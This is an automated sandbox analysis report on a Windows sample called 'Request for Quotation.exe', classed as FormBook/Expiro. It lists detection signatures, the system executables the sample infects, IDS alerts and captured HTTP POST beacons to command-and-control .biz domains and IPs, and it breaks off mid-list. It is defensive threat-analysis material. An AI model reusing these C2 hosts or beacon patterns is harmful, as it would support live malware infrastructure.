
Windows Analysis Report
Request for Quotation.exe

Overview

General Information

Sample name: Request for Quotation.exe
Analysis ID: 1572510
MD5: fe6fb05450b37478070255dcf0a11654
SHA1: a6246b77f50e6abb2cde5bd9071c9e005974349b
SHA256: 34d8fc929f49899ffc738a5f19e97b9d1d2d6e63b26884af6ce803d9aed050bb
Tags: exe, Expiro, user-low, mal3

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Contains functionality to behave differently if execute on a Russian/Kazak computer
Creates files in the system32 config directory
Drops executable to a common third party application directory
Found direct / indirect Syscall (likely to bypass EDR)
Infects executable files (exe, dll, sys, html)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Writes to foreign memory regions
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Enables driver privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Uncommon Svchost Parent Process
Spawns drivers
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • Request for Quotation.exe (PID: 6584 cmdline: "C:\Users\user\Desktop\Request for Quotation.exe" MD5: FE6FB05450B37478070255DCF0A11654)
    • svchost.exe (PID: 7392 cmdline: "C:\Users\user\Desktop\Request for Quotation.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
  • armsvc.exe (PID: 6648 cmdline: "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe" MD5: 68F239C01813FB34CDEBECC73B16EDE9)
  • alg.exe (PID: 1360 cmdline: C:\Windows\System32\alg.exe MD5: 5814D242CD3F0A5096ACA78A36BA8FA8)
  • AppVStrm.sys (PID: 4 cmdline: MD5: BDA55F89B69757320BC125FF1CB53B26)
  • AppvVemgr.sys (PID: 4 cmdline: MD5: E70EE9B57F8D771E2F4D6E6B535F6757)
  • AppvVfs.sys (PID: 4 cmdline: MD5: 2CBABD729D5E746B6BD8DC1B4B4DB1E1)
  • AppVClient.exe (PID: 3084 cmdline: C:\Windows\system32\AppVClient.exe MD5: 5DD1E83A36E68A7B8F2D74514F9AFFA1)
  • FXSSVC.exe (PID: 2520 cmdline: C:\Windows\system32\fxssvc.exe MD5: 4858CF6BC0503B39DCDAD51E994CDEF5)
  • elevation_service.exe (PID: 3084 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe" MD5: 50E9A4F9451FF8D2C576BF053A02B0D7)
  • maintenanceservice.exe (PID: 2520 cmdline: "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe" MD5: 3F3BEE4315081168FC542419E2F2D1A6)
  • msdtc.exe (PID: 2640 cmdline: C:\Windows\System32\msdtc.exe MD5: D8FC46BD67F795631C6DAD07E33247EE)
  • PerceptionSimulationService.exe (PID: 7176 cmdline: C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe MD5: 65E45E0DE8536F3B14E886405F9D1C56)
  • perfhost.exe (PID: 7224 cmdline: C:\Windows\SysWow64\perfhost.exe MD5: E14C66701387555047BA9BBD23773B82)
  • Locator.exe (PID: 7252 cmdline: C:\Windows\system32\locator.exe MD5: 0EA212771D99ED9B59C38AC619AF79B7)
  • SensorDataService.exe (PID: 7272 cmdline: C:\Windows\System32\SensorDataService.exe MD5: B7946E1BA775337FEE4E6785A5E67187)
  • snmptrap.exe (PID: 7312 cmdline: C:\Windows\System32\snmptrap.exe MD5: 612475391C7276C2E25FF0A0CCAD3C66)
  • Spectrum.exe (PID: 7344 cmdline: C:\Windows\system32\spectrum.exe MD5: 7708CE35FBFD8CB3DA18C4C0207016DB)
  • ssh-agent.exe (PID: 7408 cmdline: C:\Windows\System32\OpenSSH\ssh-agent.exe MD5: 7765865BFBC2AA0361E0E3A618C590B8)
  • cleanup
No configs have been found
Source | Rule | Description | Author
00000013.00000002.2017731706.0000000003310000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000013.00000002.2016638909.0000000000400000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
19.2.svchost.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
19.2.svchost.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security

          System Summary

          Source: Process started | Author: Max Altgelt (Nextron Systems) | Data: Command: , CommandLine: , CommandLine|base64offset|contains: , Image: C:\Windows\System32\drivers\AppVStrm.sys, NewProcessName: C:\Windows\System32\drivers\AppVStrm.sys, OriginalFileName: C:\Windows\System32\drivers\AppVStrm.sys, ParentCommandLine: , ParentImage: , ParentProcessId: -1, ProcessCommandLine: , ProcessId: 4, ProcessName: AppVStrm.sys
          Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Users\user\Desktop\Request for Quotation.exe", CommandLine: "C:\Users\user\Desktop\Request for Quotation.exe", CommandLine|base64offset|contains: ~, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Request for Quotation.exe", ParentImage: C:\Users\user\Desktop\Request for Quotation.exe, ParentProcessId: 6584, ParentProcessName: Request for Quotation.exe, ProcessCommandLine: "C:\Users\user\Desktop\Request for Quotation.exe", ProcessId: 7392, ProcessName: svchost.exe
          Source: Process started | Author: vburov | Data: Command: "C:\Users\user\Desktop\Request for Quotation.exe", CommandLine: "C:\Users\user\Desktop\Request for Quotation.exe", CommandLine|base64offset|contains: ~, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Request for Quotation.exe", ParentImage: C:\Users\user\Desktop\Request for Quotation.exe, ParentProcessId: 6584, ParentProcessName: Request for Quotation.exe, ProcessCommandLine: "C:\Users\user\Desktop\Request for Quotation.exe", ProcessId: 7392, ProcessName: svchost.exe
          Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
          2024-12-10T16:40:22.228667+0100 | 2051649 | 1 | A Network Trojan was detected | 192.168.2.4 | 53201 | 1.1.1.1 | 53 | UDP
          2024-12-10T16:40:15.049057+0100 | 2051648 | 1 | A Network Trojan was detected | 192.168.2.4 | 56682 | 1.1.1.1 | 53 | UDP
          2024-12-10T16:40:07.592457+0100 | 2018141 | 1 | A Network Trojan was detected | 54.244.188.177 | 80 | 192.168.2.4 | 49730 | TCP
          2024-12-10T16:40:11.038990+0100 | 2018141 | 1 | A Network Trojan was detected | 18.141.10.107 | 80 | 192.168.2.4 | 49733 | TCP
          2024-12-10T16:40:15.089548+0100 | 2018141 | 1 | A Network Trojan was detected | 44.221.84.105 | 80 | 192.168.2.4 | 49735 | TCP
          2024-12-10T16:41:59.468543+0100 | 2018141 | 1 | A Network Trojan was detected | 47.129.31.212 | 80 | 192.168.2.4 | 49882 | TCP
          2024-12-10T16:42:01.940809+0100 | 2018141 | 1 | A Network Trojan was detected | 13.251.16.150 | 80 | 192.168.2.4 | 49888 | TCP
          2024-12-10T16:40:07.592457+0100 | 2037771 | 1 | A Network Trojan was detected | 54.244.188.177 | 80 | 192.168.2.4 | 49730 | TCP
          2024-12-10T16:40:11.038990+0100 | 2037771 | 1 | A Network Trojan was detected | 18.141.10.107 | 80 | 192.168.2.4 | 49733 | TCP
          2024-12-10T16:40:15.089548+0100 | 2037771 | 1 | A Network Trojan was detected | 44.221.84.105 | 80 | 192.168.2.4 | 49735 | TCP
          2024-12-10T16:41:59.468543+0100 | 2037771 | 1 | A Network Trojan was detected | 47.129.31.212 | 80 | 192.168.2.4 | 49882 | TCP
          2024-12-10T16:42:01.940809+0100 | 2037771 | 1 | A Network Trojan was detected | 13.251.16.150 | 80 | 192.168.2.4 | 49888 | TCP
          2024-12-10T16:40:14.844579+0100 | 2850851 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49735 | 44.221.84.105 | 80 | TCP
          2024-12-10T16:41:56.640663+0100 | 2850851 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49836 | 82.112.184.197 | 80 | TCP


          AV Detection

          Source: Request for Quotation.exe | Avira: detected
          Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Avira: detection malicious, Label: W32/Infector.Gen
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe | Avira: detection malicious, Label: W32/Infector.Gen
          Source: C:\Windows\System32\Spectrum.exe | Avira: detection malicious, Label: W32/Infector.Gen
          Source: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe | Avira: detection malicious, Label: W32/Infector.Gen
          Source: C:\Windows\System32\snmptrap.exe | Avira: detection malicious, Label: W32/Infector.Gen
          Source: C:\Windows\System32\msiexec.exe | Avira: detection malicious, Label: W32/Infector.Gen
          Source: C:\Windows\System32\SensorDataService.exe | Avira: detection malicious, Label: W32/Infector.Gen
          Source: C:\Windows\System32\AppVClient.exe | Avira: detection malicious, Label: W32/Infector.Gen
          Source: C:\Windows\System32\msdtc.exe | Avira: detection malicious, Label: W32/Infector.Gen
          Source: C:\Windows\System32\Locator.exe | Avira: detection malicious, Label: W32/Infector.Gen
          Source: C:\Windows\SysWOW64\perfhost.exe | Avira: detection malicious, Label: W32/Infector.Gen
          Source: C:\Windows\System32\OpenSSH\ssh-agent.exe | Avira: detection malicious, Label: W32/Infector.Gen
          Source: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe | Avira: detection malicious, Label: W32/Infector.Gen
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe | Avira: detection malicious, Label: W32/Infector.Gen
          Source: C:\Windows\System32\FXSSVC.exe | Avira: detection malicious, Label: W32/Infector.Gen
          Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe | Avira: detection malicious, Label: W32/Infector.Gen
          Source: C:\Windows\System32\alg.exe | Avira: detection malicious, Label: W32/Infector.Gen
          Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe | Avira: detection malicious, Label: W32/Infector.Gen
          Source: Request for Quotation.exe | ReversingLabs: Detection: 81%
          Source: Yara match | File source: 19.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 19.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000013.00000002.2017731706.0000000003310000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000013.00000002.2016638909.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
          Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Joe Sandbox ML: detected
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe | Joe Sandbox ML: detected
          Source: C:\Windows\System32\Spectrum.exe | Joe Sandbox ML: detected
          Source: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe | Joe Sandbox ML: detected
          Source: C:\Windows\System32\snmptrap.exe | Joe Sandbox ML: detected
          Source: C:\Windows\System32\msiexec.exe | Joe Sandbox ML: detected
          Source: C:\Windows\System32\SensorDataService.exe | Joe Sandbox ML: detected
          Source: C:\Windows\System32\AppVClient.exe | Joe Sandbox ML: detected
          Source: C:\Windows\System32\msdtc.exe | Joe Sandbox ML: detected
          Source: C:\Windows\System32\Locator.exe | Joe Sandbox ML: detected
          Source: C:\Windows\SysWOW64\perfhost.exe | Joe Sandbox ML: detected
          Source: C:\Windows\System32\OpenSSH\ssh-agent.exe | Joe Sandbox ML: detected
          Source: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe | Joe Sandbox ML: detected
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe | Joe Sandbox ML: detected
          Source: C:\Windows\System32\FXSSVC.exe | Joe Sandbox ML: detected
          Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe | Joe Sandbox ML: detected
          Source: C:\Windows\System32\alg.exe | Joe Sandbox ML: detected
          Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe | Joe Sandbox ML: detected
          Source: Request for Quotation.exe | Joe Sandbox ML: detected
          Source: Request for Quotation.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
          Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: Request for Quotation.exe, 00000000.00000003.1706837407.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe.0.dr
          Source: Binary string: msiexec.pdb source: msiexec.exe.0.dr
          Source: Binary string: SensorDataService.pdb source: SensorDataService.exe.0.dr
          Source: Binary string: D:\a\_work\e\src\out\Release_x64\elevation_service.exe.pdb source: elevation_service.exe.0.dr
          Source: Binary string: AppVClient.pdbGCTL source: AppVClient.exe.0.dr
          Source: Binary string: SensorDataService.pdbGCTL source: SensorDataService.exe.0.dr
          Source: Binary string: PerfHost.pdb source: perfhost.exe.0.dr
          Source: Binary string: AppVClient.pdb source: AppVClient.exe.0.dr
          Source: Binary string: ssh-agent.pdb source: ssh-agent.exe.0.dr
          Source: Binary string: msiexec.pdbGCTL source: msiexec.exe.0.dr
          Source: Binary string: PresentationFontCache.pdb source: Request for Quotation.exe, 00000000.00000003.1747636578.00000000041B0000.00000004.00001000.00020000.00000000.sdmp
          Source: Binary string: maintenanceservice.pdb` source: maintenanceservice.exe.0.dr
          Source: Binary string: PerceptionSimulationService.pdb source: PerceptionSimulationService.exe.0.dr
          Source: Binary string: wntdll.pdbUGP source: svchost.exe, 00000013.00000003.1966749600.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.2017801788.000000000369E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.2017801788.0000000003500000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.1963812454.0000000003100000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: svchost.exe, svchost.exe, 00000013.00000003.1966749600.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.2017801788.000000000369E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.2017801788.0000000003500000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.1963812454.0000000003100000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: D:\a\_work\e\src\out\Release_x64\elevation_service.exe.pdbOGP source: elevation_service.exe.0.dr
          Source: Binary string: Spectrum.pdb source: Spectrum.exe.0.dr
          Source: Binary string: MsSense.pdbGCTL source: MsSense.exe.0.dr
          Source: Binary string: MsSense.pdb source: MsSense.exe.0.dr
          Source: Binary string: FXSSVC.pdb source: FXSSVC.exe.0.dr
          Source: Binary string: ALG.pdb source: Request for Quotation.exe, 00000000.00000003.1711267441.0000000003F20000.00000004.00001000.00020000.00000000.sdmp, alg.exe.0.dr
          Source: Binary string: Spectrum.pdbGCTL source: Spectrum.exe.0.dr
          Source: Binary string: locator.pdb source: Locator.exe.0.dr
          Source: Binary string: msdtcexe.pdb source: msdtc.exe.0.dr
          Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdb source: Request for Quotation.exe, 00000000.00000003.1732378298.00000000040F0000.00000004.00001000.00020000.00000000.sdmp, DiagnosticsHub.StandardCollector.Service.exe.0.dr
          Source: Binary string: ALG.pdbGCTL source: Request for Quotation.exe, 00000000.00000003.1711267441.0000000003F20000.00000004.00001000.00020000.00000000.sdmp, alg.exe.0.dr
          Source: Binary string: PresentationFontCache.pdbHt^t Pt_CorExeMainmscoree.dll source: Request for Quotation.exe, 00000000.00000003.1747636578.00000000041B0000.00000004.00001000.00020000.00000000.sdmp
          Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdbGCTL source: Request for Quotation.exe, 00000000.00000003.1732378298.00000000040F0000.00000004.00001000.00020000.00000000.sdmp, DiagnosticsHub.StandardCollector.Service.exe.0.dr
          Source: Binary string: locator.pdbGCTL source: Locator.exe.0.dr
          Source: Binary string: FXSSVC.pdbGCTL source: FXSSVC.exe.0.dr
          Source: Binary string: ssh-agent.pdbX source: ssh-agent.exe.0.dr
          Source: Binary string: snmptrap.pdb source: snmptrap.exe.0.dr
          Source: Binary string: C:\b\s\w\ir\cache\builder\src\out\Release_x64\elevation_service.exe.pdb source: elevation_service.exe0.0.dr
          Source: Binary string: snmptrap.pdbGCTL source: snmptrap.exe.0.dr
          Source: Binary string: msdtcexe.pdbGCTL source: msdtc.exe.0.dr
          Source: Binary string: PerceptionSimulationService.pdbGCTL source: PerceptionSimulationService.exe.0.dr
          Source: Binary string: maintenanceservice.pdb source: maintenanceservice.exe.0.dr
          Source: Binary string: PerfHost.pdbGCTL source: perfhost.exe.0.dr

          Spreading

          Source: C:\Users\user\Desktop\Request for Quotation.exe | System file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
          Source: C:\Users\user\Desktop\Request for Quotation.exe | System file written: C:\Windows\System32\snmptrap.exe
          Source: C:\Users\user\Desktop\Request for Quotation.exe | System file written: C:\Windows\System32\Spectrum.exe
          Source: C:\Users\user\Desktop\Request for Quotation.exe | System file written: C:\Windows\System32\Locator.exe
          Source: C:\Users\user\Desktop\Request for Quotation.exe | System file written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe
          Source: C:\Users\user\Desktop\Request for Quotation.exe | System file written: C:\Windows\System32\AppVClient.exe
          Source: C:\Users\user\Desktop\Request for Quotation.exe | System file written: C:\Windows\System32\FXSSVC.exe
          Source: C:\Users\user\Desktop\Request for Quotation.exe | System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
          Source: C:\Users\user\Desktop\Request for Quotation.exe | System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
          Source: C:\Users\user\Desktop\Request for Quotation.exe | System file written: C:\Windows\System32\OpenSSH\ssh-agent.exe
          Source: C:\Users\user\Desktop\Request for Quotation.exe | System file written: C:\Windows\System32\alg.exe
          Source: C:\Users\user\Desktop\Request for Quotation.exe | System file written: C:\Windows\SysWOW64\perfhost.exe
          Source: C:\Users\user\Desktop\Request for Quotation.exe | System file written: C:\Windows\System32\msiexec.exe
          Source: C:\Users\user\Desktop\Request for Quotation.exe | System file written: C:\Windows\System32\SensorDataService.exe
          Source: C:\Users\user\Desktop\Request for Quotation.exe | System file written: C:\Windows\System32\msdtc.exe
          Source: C:\Users\user\Desktop\Request for Quotation.exe | System file written: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe
          Source: C:\Users\user\Desktop\Request for Quotation.exe | System file written: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe
          Source: C:\Users\user\Desktop\Request for Quotation.exe | System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exe

          Networking

          Source: Network traffic | Suricata IDS: 2051649 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) : 192.168.2.4:53201 -> 1.1.1.1:53
          Source: Network traffic | Suricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.4:56682 -> 1.1.1.1:53
          Source: Network traffic | Suricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.4:49735 -> 44.221.84.105:80
          Source: Network traffic | Suricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.4:49836 -> 82.112.184.197:80
          Source: Joe Sandbox View | IP Address: 54.244.188.177
          Source: Joe Sandbox View | IP Address: 18.141.10.107
          Source: Network traffic | Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.141.10.107:80 -> 192.168.2.4:49733
          Source: Network traffic | Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 54.244.188.177:80 -> 192.168.2.4:49730
          Source: Network traffic | Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.141.10.107:80 -> 192.168.2.4:49733
          Source: Network traffic | Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 54.244.188.177:80 -> 192.168.2.4:49730
          Source: Network traffic | Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 44.221.84.105:80 -> 192.168.2.4:49735
          Source: Network traffic | Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 44.221.84.105:80 -> 192.168.2.4:49735
          Source: Network traffic | Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 47.129.31.212:80 -> 192.168.2.4:49882
          Source: Network traffic | Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 13.251.16.150:80 -> 192.168.2.4:49888
          Source: Network traffic | Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 13.251.16.150:80 -> 192.168.2.4:49888
          Source: Network traffic | Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 47.129.31.212:80 -> 192.168.2.4:49882
          Source: global traffic | HTTP traffic detected:
              POST /miswwsapbqmsir HTTP/1.1
              Cache-Control: no-cache
              Connection: Keep-Alive
              Pragma: no-cache
              Host: pywolwnvd.biz
              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
              Content-Length: 824
          Source: global traffic | HTTP traffic detected:
              POST /hcwjealfbuy HTTP/1.1
              Cache-Control: no-cache
              Connection: Keep-Alive
              Pragma: no-cache
              Host: pywolwnvd.biz
              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
              Content-Length: 874
          Source: global traffic | HTTP traffic detected:
              POST /njrv HTTP/1.1
              Cache-Control: no-cache
              Connection: Keep-Alive
              Pragma: no-cache
              Host: ssbzmoy.biz
              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
              Content-Length: 824
          Source: global traffic | HTTP traffic detected:
              POST /kr HTTP/1.1
              Cache-Control: no-cache
              Connection: Keep-Alive
              Pragma: no-cache
              Host: ssbzmoy.biz
              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
              Content-Length: 874
          Source: global traffic | HTTP traffic detected:
              POST /iropyruplkan HTTP/1.1
              Cache-Control: no-cache
              Connection: Keep-Alive
              Pragma: no-cache
              Host: cvgrf.biz
              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
              Content-Length: 874
          Source: global traffic | HTTP traffic detected:
              POST /hgpugagvc HTTP/1.1
              Cache-Control: no-cache
              Connection: Keep-Alive
              Pragma: no-cache
              Host: knjghuig.biz
              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
              Content-Length: 874
          Source: global traffic | HTTP traffic detected:
              POST /ytpebbldheutao HTTP/1.1
              Cache-Control: no-cache
              Connection: Keep-Alive
              Pragma: no-cache
              Host: vcddkls.biz
              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
              Content-Length: 874
          Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global traffic | DNS traffic detected: DNS query: pywolwnvd.biz
          Source: global traffic | DNS traffic detected: DNS query: ssbzmoy.biz
          Source: global traffic | DNS traffic detected: DNS query: fwiwk.biz
          Source: unknown | HTTP traffic detected:
              POST /miswwsapbqmsir HTTP/1.1
              Cache-Control: no-cache
              Connection: Keep-Alive
              Pragma: no-cache
              Host: pywolwnvd.biz
              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
              Content-Length: 824
          Source: Request for Quotation.exe, 00000000.00000003.1768862555.0000000000EB1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://18.141.10.107/
          Source: Request for Quotation.exe, 00000000.00000003.1737413561.0000000000EB1000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1745556871.0000000000EB1000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1743658598.0000000000EB1000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1744762476.0000000000EB1000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1759386922.0000000000EB1000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1743149995.0000000000EB1000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1757640309.0000000000EB1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://54.244.188.177/
          Source: Request for Quotation.exe, 00000000.00000003.1768862555.0000000000EB1000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1759829685.0000000000EB1000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1758403499.0000000000EB1000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1767780343.0000000000EB1000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1759386922.0000000000EB1000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1757640309.0000000000EB1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://54.244.188.177/1
          Source: Request for Quotation.exe, 00000000.00000003.1739856220.0000000000E72000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1759386922.0000000000E72000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1748580757.0000000000E72000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1744146667.0000000000E72000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1758403499.0000000000E72000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1747429848.0000000000E72000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1741441665.0000000000E72000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1744762476.0000000000E72000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 